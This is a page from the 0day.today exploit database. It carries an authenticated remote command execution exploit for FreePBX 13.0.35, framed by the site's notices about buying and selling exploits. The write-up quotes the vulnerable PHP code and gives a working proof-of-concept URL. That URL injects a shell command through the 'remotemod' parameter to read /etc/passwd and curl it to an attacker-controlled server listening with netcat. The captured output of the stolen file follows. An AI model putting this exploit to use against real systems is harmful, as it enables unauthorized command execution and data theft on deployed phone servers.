0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
FreePBX 13.0.35 - Remote Command Execution
Vulnerable software : Freepbx Tested version : 13.0.35 vendor : freepbx.org Author : Ahmed sultan (0x4148) Email : 0x4148@gmail.com Summary : FreePBX is a web-based open source GUI (graphical user interface) that controls and manages Asterisk (PBX), an open source communication server, With over 1 MILLION production systems worldwide and 20,000 new systems installed monthly, the FreePBX community continues to out-perform the industry's commercial efforts. The FreePBX EcoSystem has developed over the past decade to be the most widely deployed open source PBX platform in use across the world. Vulnerability details : Freepbx suffer from (Authenticated) remote code execution flaw Boring technical stuff File : functions.inc.php function get_headers_assoc($url) { global $amp_conf; if ($amp_conf['MODULEADMINWGET']) { FreePBX::Curl()->setEnvVariables(); exec("wget --spider --server-response -q ".$url." 2>&1", $wgetout, $exitstatus); $headers = array(); if($exitstatus == 0 && !empty($wgetout)) { foreach($wgetout as $value) { $ar = explode(':', $value); $key = trim($ar[0]); if(isset($ar[1])) { $value = trim($ar[1]); $headers[strtolower($key)] = trim($value); } the $url is not being sanitized before being passed to the 'exec' function which lead to Command execution flaw The function is being called at File : libraries/modulefunctions.class.php Line 1539 : function handledownload($module_location, $progress_callback = null) { ................................................... // invoke progress callback if (!is_array($progress_callback) && function_exists($progress_callback)) { $progress_callback('getinfo', array('module'=>$modulename)); } else if(is_array($progress_callback) && method_exists($progress_callback[0],$progress_callback[1])) { $progress_callback[0]->$progress_callback[1]('getinfo', array('module'=>$modulename)); } $file = basename($module_location); $filename = $amp_conf['AMPWEBROOT']."/admin/modules/_cache/".$file; // Check each URL until get_headers_assoc() returns something intelligible. We then use // that URL and hope the file is there, we won't check others. -=>>>>>> $headers = get_headers_assoc($module_location); if (empty($headers)) { return array(sprintf(_('Failed download module tarball from %s, server may be down'),$module_location)); } the handledownload function is called via the admin panel whenever the page.modules.php file is included which can be basically done using admin/config.php?display=modules File : page.modules.php Line 174 : switch ($action) { .............................. Line 643 : case 'upload': .............................. Line 658 : $displayvars['processed'] = false; if (isset($_REQUEST['upload']) && isset($_FILES['uploadmod']) && !empty($_FILES['uploadmod']['name'])) { $displayvars['res'] = $modulef->handleupload($_FILES['uploadmod']); $displayvars['processed'] = true; } elseif (isset($_REQUEST['download']) && !empty($_REQUEST['remotemod'])) { $displayvars['res'] = $modulef->handledownload($_REQUEST['remotemod']); $displayvars['processed'] = true; } elseif(isset($_REQUEST['remotemod'])) { $displayvars['res'][] = 'Nothing to download or upload'; $displayvars['processed'] = true; } the 'remotemod' parameter is passed to exec function without being sanitized , which lead to the mentioned flaw POC On attacker's side run nc -lvp 8080 on target's side loginto the panel and then browse to http://TARGET/admin/config.php?display=modules&action=upload&download=0x4148&remotemod=http://127.0.0.1/junk%26x=$(cat /etc/passwd);curl -d "$x" http://Attacker_server:8080/0x4148.jnk Result [0x4148:/lab]# nc -lvp 8080 listening on [any] 8080 ... DNS fwd/rev mismatch: x.x.x.x != xxxxxx.com connect to [ATTACKER] from x.x.x.x.x [Target] 45934 POST //0x4148.jnk HTTP/1.1 User-Agent: curl/7.19.7 (x86_64-redhat-linux-gnu) libcurl/7.19.7 NSS/3.16.2.3 Basic ECC zlib/1.2.3 libidn/1.18 libssh2/1.4.2 Host: ATTACKER:8080 Accept: */* Content-Length: 1391 Content-Type: application/x-www-form-urlencoded Expect: 100-continue root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin asterisk:x:499:498::/home/asterisk:/bin/bash radiusd:x:95:95:radiusd user:/home/radiusd:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash haldaemon:x:68:68:HAL daemon:/:/sbin/nologin openvpn:x:498:497:OpenVPN:/etc/openvpn:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin saslauth:x:497:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin avahi:x:70:70:Avahi mDNS/DNS-SD Stack:/var/run/avahi-daemon:/sbin/nologin prosody:x:496:495::/var/lib/prosody:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin # 0day.today [2024-06-23] #